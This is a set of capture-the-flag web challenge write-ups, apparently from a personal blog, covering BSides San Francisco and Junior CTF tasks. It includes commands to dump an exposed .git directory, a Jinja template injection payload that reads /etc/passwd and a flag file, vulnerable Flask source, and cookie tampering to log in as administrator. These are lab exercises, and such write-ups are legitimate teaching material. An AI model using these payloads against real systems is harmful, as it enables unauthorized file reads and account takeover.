[BSides San Francisco CTF] Web 100 the-year-2000

Link : http://theyear2000.ctf.bsidessf.net/

As he says in this web: made with apache,git,notepad++,html

After one hour searching i find out git vulnerability

I use gitdumper and extractor to solve this challenge:

first:
gitdumper.sh http://theyear2000.ctf.bsidessf.net/.git/ repo

secondly:
extractor.sh repo/ doom/

Open doom directory, we can see 3 folders:

Let cat one by one
cat doom/0-9e9ce4da43d0d2dc10ece64f75ec9cab1f4e5de0/index.html

I got lucky, the flag is in there:
FLAG:what_is_HEAD_may_never_die

[BSides San Francisco CTF] Web 100 zumbo2

View the source code i can see server.py find and i open it
http://zumbo-8ac445b1.ctf.bsidessf.net/server.py

and i found with open(‘/flag’) which mean you have to find the way to reach to flag file.

I also found Jinja template injection in this, just try:
http://zumbo-8ac445b1.ctf.bsidessf.net/index.template{{7*7}} and you will see

Open burpsuite and test:

First :
GET  /index.template{{”.__class__.__mro__[2].__subclasses__()[40](‘/etc/passwd’).read()}}  HTTP/1.1 -> it will show the content of passwd file

Second try:

GET  /index.template{{”.__class__.__mro__[2].__subclasses__()[40](‘/flag’).read()}}  HTTP/1.1

-> TADA -> FLAG: RUNNER_ON_SECOND_BASE

[BSides San Francisco CTF] Web 20p zumbo1

Link : http://zumbo-8ac445b1.ctf.bsidessf.net/index.template
View source code we will see server.py file which contents :

import flask, sys, os
import requests

app = flask.Flask(__name__)
counter = 12345672

@app.route(‘/’)
def custom_page(page):
if page == ‘favicon.ico’: return ”
global counter
counter += 1
try:
template = open(page).read()
except Exception as e:
template = str(e)
template += “\n\n” % (page, __file__)
return flask.render_template_string(template, name=’test’, counter=counter);

@app.route(‘/’)
def home():
return flask.redirect(‘/index.template’);

if __name__ == ‘__main__’:
flag1 = ‘FLAG: FIRST_FLAG_WASNT_HARD’
with open(‘/flag’) as f:
flag2 = f.read()
flag3 = requests.get(‘http://vault:8080/flag’).text

print “Ready set go!”

sys.stdout.flush()

app.run(host=”0.0.0.0″)

and flag1 = FLAG: FIRST_FLAG_WASNT_HARD -> yup this is what i need

[BSides San Francisco CTF] web easyauth 30p

Link: http://easyauth-afee0e67.ctf.bsidessf.net

and file easyauth.php
Hint say try to login with guest/guest and i found out cookie which look like:

auth=username=guest&date=………..
Open easyauth.php file we will see a line “It’s cool that you logged in, but unfortunately we can only give the flag to ‘administrator’. :(“

It’s easy,right?? Change guest by administrator
——–> FLAG:0076ecde2daae415d7e5ccc7db909e7e
ezpz lemon squeezy

[Junior CTF 2016] WEB 100p Black Suprematic Square.

In this challenge, I checked source code of the website I detected 2 links in source code.

The first link is a black square we saw before , and the second is another image.

FLAG is:

aima0AiwahsidupaiToehoong1PhieruqueivahphieKah7uceetair9aiGae1eSsaedoo4becooShohhu8eifahXi7EJoh2gaephechei5chiP9